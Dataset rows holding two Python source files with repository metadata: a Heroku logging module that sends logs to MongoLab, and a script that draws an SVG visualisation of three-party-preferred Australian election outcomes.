"api_name": "numpy.sqrt",
"line_number": ... |
11545489040 | from logging import INFO, getLogger, StreamHandler, Formatter, DEBUG, INFO
from os import environ
from urlparse import urlparse
from gunicorn.glogging import Logger
from log4mongo.handlers import MongoHandler, MongoFormatter
# parse the MONGOLAB_URI environment variable to get the auth/db info
MONGOLAB_URI_PARSED = urlparse( environ[ 'MONGOLAB_URI' ] )
MONGOLAB_CONF_DICT = dict(
host = MONGOLAB_URI_PARSED.hostname,
port = MONGOLAB_URI_PARSED.port,
database_name = MONGOLAB_URI_PARSED.path[ 1: ],
username = MONGOLAB_URI_PARSED.username,
password = MONGOLAB_URI_PARSED.password
)
# determine if we are running in production (e.g., on Heroku), or locally
PRODUCTION = environ[ 'VERSION' ] == 'production'
# setup the root logger so that application logs go to mongolab
def setup_logging( name ):
root_logger = getLogger( name )
if PRODUCTION:
handler = MongoHandler( level = DEBUG, collection = 'application-log', **MONGOLAB_CONF_DICT )
handler.setFormatter( MongoFormatter() )
else:
handler = StreamHandler()
handler.setLevel( DEBUG )
handler.setFormatter( Formatter( '%(asctime)s [%(process)d] [%(levelname)s/APPLICATION] %(message)s', '%Y.%m:%d %H:%M:%S' ) )
root_logger.setLevel( DEBUG )
root_logger.addHandler( handler )
# define a logger so that gunicorn sends access and error logs to mongolab
class GunicornLogger( Logger ):
def __init__( self, cfg ):
super( GunicornLogger, self ).__init__( cfg )
if PRODUCTION:
access_handler = MongoHandler( level = INFO, collection = 'access-log', **MONGOLAB_CONF_DICT )
error_handler = MongoHandler( level = INFO, collection = 'error-log', **MONGOLAB_CONF_DICT )
access_handler.setFormatter( MongoFormatter() )
error_handler.setFormatter( MongoFormatter() )
self.error_log.addHandler( error_handler )
self.error_log.setLevel( INFO )
else:
access_handler = StreamHandler()
access_handler.setFormatter( Formatter( '%(asctime)s [%(process)d] [%(levelname)s/ACCESS] %(message)s', '%Y.%m:%d %H:%M:%S' ) )
self.access_log.addHandler( access_handler )
self.access_log.setLevel( INFO )
| mapio/heroku-log4mongo | heroku-log4mongo/logger.py | logger.py | py | 2,096 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "urlparse.urlparse",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "os.environ",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line... |
11168036307 | #!python3
"""
Construct a mouseoverable SVG of three-party-preferred outcomes.
We'll call the three parties "blue" (x-axis), "green" (y-axis) and "red" (with R + G + B == 1).
The primary methods that you'll want to call are `get_args` and `construct_svg`.
"""
from typing import Tuple
import sys
import math
from enum import Enum
import argparse
DEFAULT_CSS = """
text {font-family: sans-serif; font-size: 10px; fill: #222;}
text.label {filter: url(#keylineEffect); font-weight: bold}
/* dot, red, green, blue, tie*/
.d {opacity:0.6;}
.d:hover {opacity:1;}
.r {fill: #d04}
.g {fill: #0a2}
.b {fill: #08e}
.t {fill: #888}
/* point of interest */
.poi {stroke:#000; fill-opacity:0.4; stroke-width: 0.3%}
.line {stroke: #222; stroke-width: 0.5%; fill:none; stroke-linecap:round;}
#triangle {fill: #222}
.arrow {fill:none; stroke:#111; stroke-width:0.5%; stroke-dasharray:4 2; stroke-dashoffset:0;}
.bg {fill: #fff}
"""
class Party(Enum):
RED = ("Labor", "r")
GREEN = ("Greens", "g")
BLUE = ("Coalition", "b")
# NOTE: throughout this file we'll use a variable called `A` to store our general state
# This replaces the original and pervasive use of globals.
# Default values are set in `get_args`
def p2c(blue_pct: float, green_pct: float, A: argparse.Namespace) -> Tuple[float, float]:
'''Percentages to Coordinates'''
# trying to account for being out-of-frame here was worse than not doing it
# additional context is needed and hence now line() exists
x = ((blue_pct - A.start) / (A.stop - A.start)) * \
A.inner_width + A.offset * A.scale
y = A.inner_width * (1 - ((green_pct - A.start) /
(A.stop - A.start))) + A.scale
return (x, y)
def calculate_winner(red_pct: float, green_pct: float, blue_pct: float, A: argparse.Namespace) -> Tuple[Party, float]:
'''Given 3PP percentages, calculate the winner and their 2CP result.
Ties for third are resolved where the winner is the same either way,
with the tighter 2CP result reported.'''
def eq(x, y):
"""Equal, to a certain tolerance"""
# sufficiently close for our purposes
return math.isclose(x, y, abs_tol=A.step/10)
def lt(x, y):
"""Strictly less than, beyond a certain tolerance"""
return (x < y) and not eq(x, y)
def gt(x, y):
"""Strictly greater than, beyond a certain tolerance"""
return lt(y, x)
# need to figure out who came third, then who won
if lt(red_pct, green_pct) and lt(red_pct, blue_pct):
# Red came third
tcp = green_pct + (A.red_to_green * red_pct)
if gt(tcp, 0.5):
return (Party.GREEN, tcp)
elif gt(1.0 - tcp, 0.5):
return (Party.BLUE, 1.0 - tcp)
if lt(green_pct, red_pct) and lt(green_pct, blue_pct):
# Green came third
tcp = red_pct + (A.green_to_red * green_pct)
if gt(tcp, 0.5):
return (Party.RED, tcp)
elif gt(1.0 - tcp, 0.5):
return (Party.BLUE, 1.0 - tcp)
if lt(blue_pct, green_pct) and lt(blue_pct, red_pct):
# Blue came third
tcp = red_pct + (A.blue_to_red * blue_pct)
if gt(tcp, 0.5):
return (Party.RED, tcp)
elif gt(1.0 - tcp, 0.5):
return (Party.GREEN, 1.0 - tcp)
# print("likely tie:", green_pct, red_pct, blue_pct, file=sys.stderr)
# resolve some ties for third
# if the leading party would win EITHER way, report their win and tightest margin
# else, return nothing (interpreted as a tie)
if eq(green_pct, blue_pct) and lt(green_pct, red_pct):
# Red leading
gex = green_pct * A.green_to_red
bex = blue_pct * A.blue_to_red
if red_pct + gex > 0.5 and red_pct + bex > 0.5:
return (Party.RED, red_pct + min(gex, bex))
if eq(red_pct, blue_pct) and lt(red_pct, green_pct):
# Green leading
rex = red_pct * A.red_to_green
bex = blue_pct * A.blue_to_green
if green_pct + rex > 0.5 and green_pct + bex > 0.5:
return (Party.GREEN, green_pct + min(rex, bex))
if eq(green_pct, red_pct) and lt(green_pct, blue_pct):
# Blue leading
gex = green_pct * A.green_to_blue
rex = red_pct * A.red_to_blue
if blue_pct + gex > 0.5 and blue_pct + rex > 0.5:
return (Party.BLUE, blue_pct + min(gex, rex))
# print("actual tie:", green_pct, red_pct, blue_pct, file=sys.stderr)
def construct_dot(blue_pct: float, green_pct: float, A: argparse.Namespace) -> str:
'''Given green and blue percentages, return an SVG fragment corresponding to a dot at the appropriate position.'''
red_pct = 1.0 - (green_pct + blue_pct)
(x, y) = p2c(blue_pct, green_pct, A)
tooltip_3cp = f"{Party.GREEN.value[0]}: {green_pct:.1%}, {Party.RED.value[0]}: {red_pct:.1%}, {Party.BLUE.value[0]}: {blue_pct:.1%}."
try:
(winner, margin) = calculate_winner(red_pct, green_pct, blue_pct, A)
tooltip = f"{tooltip_3cp} Winner: {(winner.value)[0]} {margin:.1%}"
return f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="{(winner.value)[1]} d"><title>{tooltip}</title></circle>'.replace(".0%", "%")
except TypeError: # raised on a tie
tooltip = f"{tooltip_3cp} Winner: TIE"
return f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="t d"><title>{tooltip}</title></circle>'.replace(".0%", "%")
def frange(start, stop=None, step=None) -> float:
'''Floating-point range. [start = 0.0], stop, [step = 1.0]'''
start = float(start)
if not stop: # switcheroo
stop = start
start = 0.0
if not step:
step = 1.0
count = 0.0
while True:
t = start + count * step
if stop > 0.0 and t >= stop:
break
elif stop < 0.0 and t <= stop:
break
yield t
count += 1.0
def clamp_val(val: float, lo: float, hi: float) -> float:
"""Constrain val to be between hi and lo"""
return max(min(val, hi), lo)
def clamp(val: float, A: argparse.Namespace) -> float:
"""Constrain val to be within A.start and A.stop"""
return clamp_val(val, A.start, A.stop)
def line(x0: float, y0: float, x1: float, y1: float, A: argparse.Namespace) -> str:
"""Takes two points (percentage-space) and returns the appropriate path fragment, ensuring that they're all in-bounds."""
# we COULD have just used <clipPath> but this is even cleaner in the SVG
# general principle: there'll be a gradient.
# if anything is off the edge, we can replace with appropriate point on the edge
xa = clamp(x0, A)
ya = clamp(y0, A)
xb = clamp(x1, A)
yb = clamp(y1, A)
if math.isclose(x0, x1):
# special case: vertical line
# we can clamp without fear
pass
elif math.isclose(y0, y1):
# horizontal line
pass
elif (x0 <= A.start and x1 <= A.start) or (y0 <= A.start and y1 <= A.start) or \
(x0 >= A.stop and x1 >= A.stop) or (y0 >= A.stop and y1 >= A.stop):
# whole of line would be off-viewport
return ""
else:
# get the line equation...
m = (y1 - y0)/(x1 - x0) # gradient
c = y0 - m * x0 # y-offset
if x0 < A.start:
ya = m * A.start + c
elif x0 > A.stop:
ya = m * A.stop + c
if x1 < A.start:
yb = m * A.start + c
elif x0 > A.stop:
yb = m * A.stop + c
if y0 < A.start:
xa = (A.start - c) / m
elif y0 > A.stop:
xa = (A.stop - c) / m
if y1 < A.start:
xb = (A.start - c) / m
elif y1 > A.stop:
xb = (A.stop - c) / m
# Finally, convert to coordinates and return
(xp, yp) = p2c(xa, ya, A)
(xq, yq) = p2c(xb, yb, A)
return f"M {xp:g} {yp:g} {xq:g} {yq:g}"
def draw_lines(A: argparse.Namespace) -> str:
"""Draw change-of-winner lines."""
# There are at least 8 points to draw lines between.
# Firstly, a line #1-#2-#3
# 1. Green vs Red on Y axis
(x1, y1) = (A.start, (0.5 - (A.start * A.blue_to_green)))
# 2. Green vs Rd midpoint. Controlled by ex-Blue split
# At max Greens-Red preferencing, it varies from
# (0.25, 0.5) at full Blue-to-Red
# degenerates at equal split (to terpoint)
# (0.25, 0.25) at full Blue-to-Green
# there's a line coming out of the terpoint that (at least for normal values)
# marks out the "Greens 3CP >= Labor 3CP == Liberal 3CP"
# 1 - (g+b) = b
# and another coming in from #1 that A.marks the Labor-Greens 2CP boundary
# g + (b * A.blue_to_green) = 0.5
# This point is where those lines cross: we have Greens 3CP >= Labor 3CP == Liberal 3CP
# g = 0.5 - (b * A.blue_to_green)
# b = 1 - ((0.5 - (b * A.blue_to_green)) + b)
# b = 0.5 + (b * A.blue_to_green) - b
# 2b = 0.5 + (b * A.blue_to_green)
# b (2 - A.blue_to_green) = 0.5
# b = 0.5 / (2 - A.blue_to_green)
b = 0.5 / (2 - A.blue_to_green)
g = 0.5 - (b * A.blue_to_green)
# if A.blue_to_red is less than half, then #2 sits on the b = g line instead
# (the gradient of the #1-#2 line is still correct)
if A.blue_to_red <= 0.5:
# g = 0.5 - (b * A.blue_to_green)
# g = 0.5 - (g * A.blue_to_green)
# g (1 + A.blue_to_green) = 0.5
g = 0.5 / (1 + A.blue_to_green)
b = g
(x2, y2) = (b, g)
# 3. the (1/3, 1/3) point ("terpoint")
# Always some sort of boundary
(x3, y3) = (1.0/3.0, 1.0/3.0)
# Line #1-#2-#3 represents the Red/Green boundary
red_green = f'{line(x1, y1, x2, y2, A)} {line(x2, y2, x3, y3, A)}'
# 4. Red vs Blue midpoint. Basically the inverse of #2, parameterised by ex-Green split
# same as above except swap b and g and use GREEN_TO_*
g = 0.5 / (2 - A.green_to_blue)
b = 0.5 - (g * A.green_to_blue)
if A.green_to_red <= 0.5:
b = 0.5 / (1 + A.green_to_blue)
g = b
(x4, y4) = (b, g)
# 5. Red vs Blue on X axis
(x5, y5) = (0.5 - A.start * A.green_to_blue, A.start)
# Lines #3 - #4 - #5 represents the Red/Blue boundary
red_blue = f'{line(x3, y3, x4, y4, A)} {line(x4, y4, x5, y5, A)}'
# 6. Blue vs Green point. This is controlled by Red's Blue/Green split
# there's one line coming "out" of the terpoint #3
# (it's NW if red favours blue, SE if red favours green)
# and one out of the hapoint #7 (the Red-comes-third line)
# (mostly W if red favours blue, mostly S if red favours green)
# This point occurs where these two lines cross
# (if red favours blue, then red and blue will be equal here)
# (if red favours green, then red and green will be equal here)
# degenerates to terpoint if equal ex-Red split
# terpoint degeneration (A.red_to_blue == 0.5)
b = 1.0/3.0
g = 1.0/3.0
if A.red_to_green == 0.0:
b = 0.25
g = 0.5
elif A.red_to_blue == 0.0:
b = 0.5
g = 0.25
elif A.red_to_blue < 0.5:
# red's coming third and favouring green
# we follow the b >= (r == g) line out of the terpoint
# (1 - (b+g)) == g
# 1 - b = 2g
# g = (1 - b)/2
# we also follow the green == blue 2CP from the hapoint
# b + r * A.red_to_blue == g + r - r * A.red_to_blue == 0.5
# b + r * A.red_to_blue = 0.5
# b + (1 - (b+g))*A.red_to_blue = 0.5
# b + (1 - (b + ((1-b)/2))) * A.red_to_blue = 0.5
# b + (1 - (b + 0.5 - 0.5b)) * A.red_to_blue = 0.5
# b + (1 - (b + 1)/2) * A.red_to_blue = 0.5
# b + ((1 - b) * A.red_to_blue / 2) = 0.5
# b - b*A.red_to_blue/2 + A.red_to_blue/2 = 0.5
# 2b - b*A.red_to_blue + A.red_to_blue = 1
# b * (2 - A.red_to_blue) + A.red_to_blue = 1
# b = A.red_to_green / (2 - A.red_to_blue)
b = A.red_to_green / (2 - A.red_to_blue)
g = (1 - b)/2
elif A.red_to_blue > 0.5:
# transpose of the < 0.5 case...
g = A.red_to_blue / (2 - A.red_to_green)
b = (1 - g)/2
(x6, y6) = (b, g)
# 7. Green vs Blue on 45 (hapoint)
# Also always some sort of boundary
(x7, y7) = (0.5, 0.5)
# Lines #3 - #6 - #7 represents the Blue/Green boundary
blue_green = f'{line(x3, y3, x6, y6, A)} {line(x6, y6, x7, y7, A)}'
# Unconditionally we also have a line down y = 1 - x
# (this passes through the hapoint too, but no direction change)
(xtop, ytop) = p2c(1.0 - A.stop, A.stop, A)
(xright, yright) = p2c(A.stop, 1.0 - A.stop, A)
top_right = f'M {xtop:g} {ytop:g} {xright:g} {yright:g}'
# OK, time to draw all the lines!
return f'\r\n<path d="{red_green} {red_blue} {blue_green} {top_right}" class="line" />\r\n'
def draw_pois(A: argparse.Namespace) -> str:
"""Draw points of interest, as appearing in the specified CSV file"""
out = ""
import csv
rdr = csv.reader(sys.stdin if A.input == "-" else open(A.input, 'r'))
for row in rdr:
try:
r0 = float(row[0])
r1 = float(row[1])
if r0 + r1 > 1.0:
raise ValueError("sum of X and Y columns must be <= 1")
r2 = row[2] if len(row) > 2 else ""
(x, y) = p2c(r0, r1, A)
tooltip = f"{r2}\n{Party.GREEN.value[0]}: {r1:.1%}, {Party.RED.value[0]}: {(1 - (r1+r0)):.1%}, {Party.BLUE.value[0]}: {r0:.1%}.".replace(
".0%", "%")
try:
(winner, margin) = calculate_winner(1 - (r0 + r1), r1, r0, A)
tooltip += f"\nWinner: {winner.value[0]} {margin:.1%}".replace(
".0%", "%")
except TypeError: # ties A.n
tooltip += "\nWinner: TIE"
out += f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="d poi"><title>{tooltip}</title></circle>\r\n'
except (TypeError, IndexError, ValueError) as e:
print("Could not parse input row:", e, file=sys.stderr)
print(row, file=sys.stderr)
return out
def construct_svg(A: argparse.Namespace) -> str:
"""Returns an SVG of the graph for given parameters as specified in `A`."""
# let's output some SVG!
out = ""
out += f'<svg viewBox="0 0 {A.width:.0f} {A.width:.0f}" version="1.1" xmlns="http://www.w3.org/2000/svg">'
# Set up <defs> section, including our triangle marker, the keyline effect and our CSS
css = DEFAULT_CSS
if A.css:
css = (A.css).read()
out += '<defs>' + \
f'<marker id="triangle" viewBox="0 0 10 10" \
refX="1" refY="5" \
markerUnits="strokeWidth" \
markerWidth="{A.scale * 0.5}" markerHeight="{A.scale * 0.5}" \
orient="auto"> \
<path d="M 0 0 L 10 5 L 0 10 z"/> \
</marker>' + \
"""<filter id="keylineEffect" color-interpolation-filters="sRGB">
<feMorphology in="SourceGraphic" result="MORPH" operator="dilate" radius="1.5"/>
<feComponentTransfer result="KEYLINE">
<!-- invert colors -->
<feFuncR type="linear" slope="-1" intercept="1" />
<feFuncG type="linear" slope="-1" intercept="1" />
<feFuncB type="linear" slope="-1" intercept="1" />
</feComponentTransfer>
<feMerge>
<feMergeNode in="KEYLINE"/>
<feMergeNode in="SourceGraphic"/>
</feMerge>
</filter>""" + \
f'<style type="text/css"><![CDATA[ \
{css} \
]]> \
</style>' + \
'</defs>'
# place a bg rect
out += f'<rect width="{A.width:.0f}" height="{A.width:.0f}" class="bg" />'
# place our dots
for b in frange(A.start, (A.stop + A.step), A.step):
for g in frange(A.start, (A.stop + A.step), A.step):
if g + b > 1.0:
continue
out += construct_dot(b, g, A)
# Draw change-of-winner lines
out += draw_lines(A)
# place points of interest
if A.input:
out += draw_pois(A)
# draw labels saying assumptions?
out += f'<text x="{A.width - A.scale*12:g}" y="{2*A.scale:g}" style="font-size:{A.scale:g}">{Party.RED.value[0]} to {Party.GREEN.value[0]}: {100.0*A.red_to_green:.1f}%</text>'
out += f'<text x="{A.width - A.scale*12:g}" y="{4*A.scale:g}" style="font-size:{A.scale:g}">{Party.GREEN.value[0]} to {Party.RED.value[0]}: {100.0*A.green_to_red:.1f}%</text>'
out += f'<text x="{A.width - A.scale*12:g}" y="{6*A.scale:g}" style="font-size:{A.scale:g}">{Party.BLUE.value[0]} to {Party.RED.value[0]}: {100.0*A.blue_to_red:.1f}%</text>'
(x0, y0) = p2c(A.start, A.start, A)
(x0, y100) = p2c(A.start, A.stop, A)
(x100, y0) = p2c(A.stop, A.start, A)
# Draw Y axis
out += f'<path d="M {x0:g} {A.width:g} V {y100:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px" marker-end="url(#triangle)"/>'
out += f'<text transform="translate({(x0 - (A.offset - 1)*A.scale):g}, {A.width/2 :g}) rotate(270)" style="text-anchor:middle">{Party.GREEN.value[0]} 3CP</text>'
for g in A.marks:
if g > A.start and g <= (A.stop):
(xpos, ypos) = p2c(A.start, g, A)
out += f'<path d="M {xpos:g} {ypos:g} h {-A.scale:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px"/>'
out += f'<text y="{(ypos + A.scale/2):g}" x="{(xpos - 3*A.scale):g}" style="font-size:{A.scale:g}; text-anchor:right; text-align:middle">{g:.0%}</text>'
# Draw X axis
out += f'<path d="M {0:g} {y0:g} H {x100:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px" marker-end="url(#triangle)"/>'
out += f'<text x="{A.width/2:g}" y="{y0 + 3.5*A.scale:g}" style="text-anchor:middle">{Party.BLUE.value[0]} 3CP</text>'
for b in A.marks:
if b > A.start and b <= (A.stop):
(xpos, ypos) = p2c(b, A.start, A)
out += f'<path d="M {xpos:g} {ypos:g} v {A.scale:g}" style="stroke: #222; stroke-width: {A.scale * 0.2:g}px"/>'
out += f'<text x="{xpos:g}" y="{ypos + 2*A.scale:g}" style="font-size:{A.scale}; text-anchor:middle">{b:.0%}</text>'
out += "\r\n<!-- Generated by https://abjago.net/3pp/ -->\r\n"
out += "</svg>"
return out
def get_args(args=None) -> argparse.Namespace:
"""pass args='' for defaults, or leave as None for checking argv.
DEFAULT VALUES are set here."""
import argparse
parser = argparse.ArgumentParser(description=f"Three-Candidate-Preferred Visualiser.\
Constructs a 2D graph with {Party.BLUE.value[0]} on the X-axis, \
{Party.GREEN.value[0]} on the Y-axis, and dots shaded by winning party.\
Prints an SVG to standard output and optionally takes a CSV of points of interest.\
N.B. all numeric values should be between zero and one.")
parser.add_argument("--green-to-red", default=0.8, type=float,
help=f"{Party.GREEN.value[0]}-to-{Party.RED.value[0]} preference ratio (default: %(default)g)")
parser.add_argument(f"--red-to-green", default=0.8, type=float,
help=f"{Party.RED.value[0]}-to-{Party.GREEN.value[0]} preference ratio (default: %(default)g)")
parser.add_argument(f"--blue-to-red", default=0.7, type=float,
help=f"{Party.BLUE.value[0]}-to-{Party.RED.value[0]} preference ratio (default: %(default)g)")
parser.add_argument("--start", default=0.2, type=float,
help="minimum X and Y axis value (default: %(default)g)")
parser.add_argument("--stop", default=0.6, type=float,
help="maximum X and Y axis value (default: %(default)g)")
parser.add_argument("--step", default=0.01, type=float,
help="precision of dots (default: %(default)g)")
parser.add_argument('--scale', default=10, type=int,
help="pixels per percent (default: %(default)g)")
parser.add_argument('--offset', default=5, type=int,
help="multiple of scale factor to A.offset axis by (default: %(default)g)")
parser.add_argument("--marks", nargs='+', default=[i/10.0 for i in range(0, 10)], metavar="MARK", type=float,
help="place axis marks at these values (default: every 10%%)")
parser.add_argument("--css", metavar='FILE',
type=argparse.FileType('r'), help="Use CSS from specified file")
parser.add_argument(
"--input", "-i", help="input CSV of points of interest (format: x, y, label) (pass - for standard input)")
parser.add_argument("--output", "-o", type=argparse.FileType('w'),
default=sys.stdout, help="output SVG (default: standard output)")
return (parser.parse_args(args))
def validate_args(A: argparse.Namespace) -> argparse.Namespace:
# Clamp A.step to be in a reasonable range
A.step = max(min(abs(A.step), 0.05), 0.002)
# clamp A.start to be a usable range
A.start = max(min(abs(A.start), 0.5 - 10*A.step), 0.0)
# If (1 - A.stop) < A.start the graph gets wonky
A.stop = min(abs(A.stop), 1 - A.start)
# Calculate sizes...
A.inner_width = A.scale * 100.0 * (A.stop - A.start)
A.width = (A.offset + 1) * A.scale + \
A.inner_width # extra on right and top
# A.scale is pixels per percent, A.step is percent per dot
A.radius = 50.0 * A.scale * A.step
# Clamp our preference flows...
A.green_to_red = max(min(abs(A.green_to_red), 1.0), 0.0)
A.red_to_green = max(min(abs(A.red_to_green), 1.0), 0.0)
A.blue_to_red = max(min(abs(A.blue_to_red), 1.0), 0.0)
# Infer the inverse flows...
A.green_to_blue = 1.0 - A.green_to_red
A.red_to_blue = 1.0 - A.red_to_green
A.blue_to_green = 1.0 - A.blue_to_red
return A
# the main show!
if __name__ == "__main__":
try:
A = validate_args(get_args())
# print(A, file=sys.stderr)
print(construct_svg(A), file=A.output)
except ValueError as e:
print(e, file=sys.stderr)
| alexjago/3pp-visualiser | visualise_cpv.py | visualise_cpv.py | py | 22,052 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "argparse.Namespace",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "typing.Tuple",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "argparse.Namespace",
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.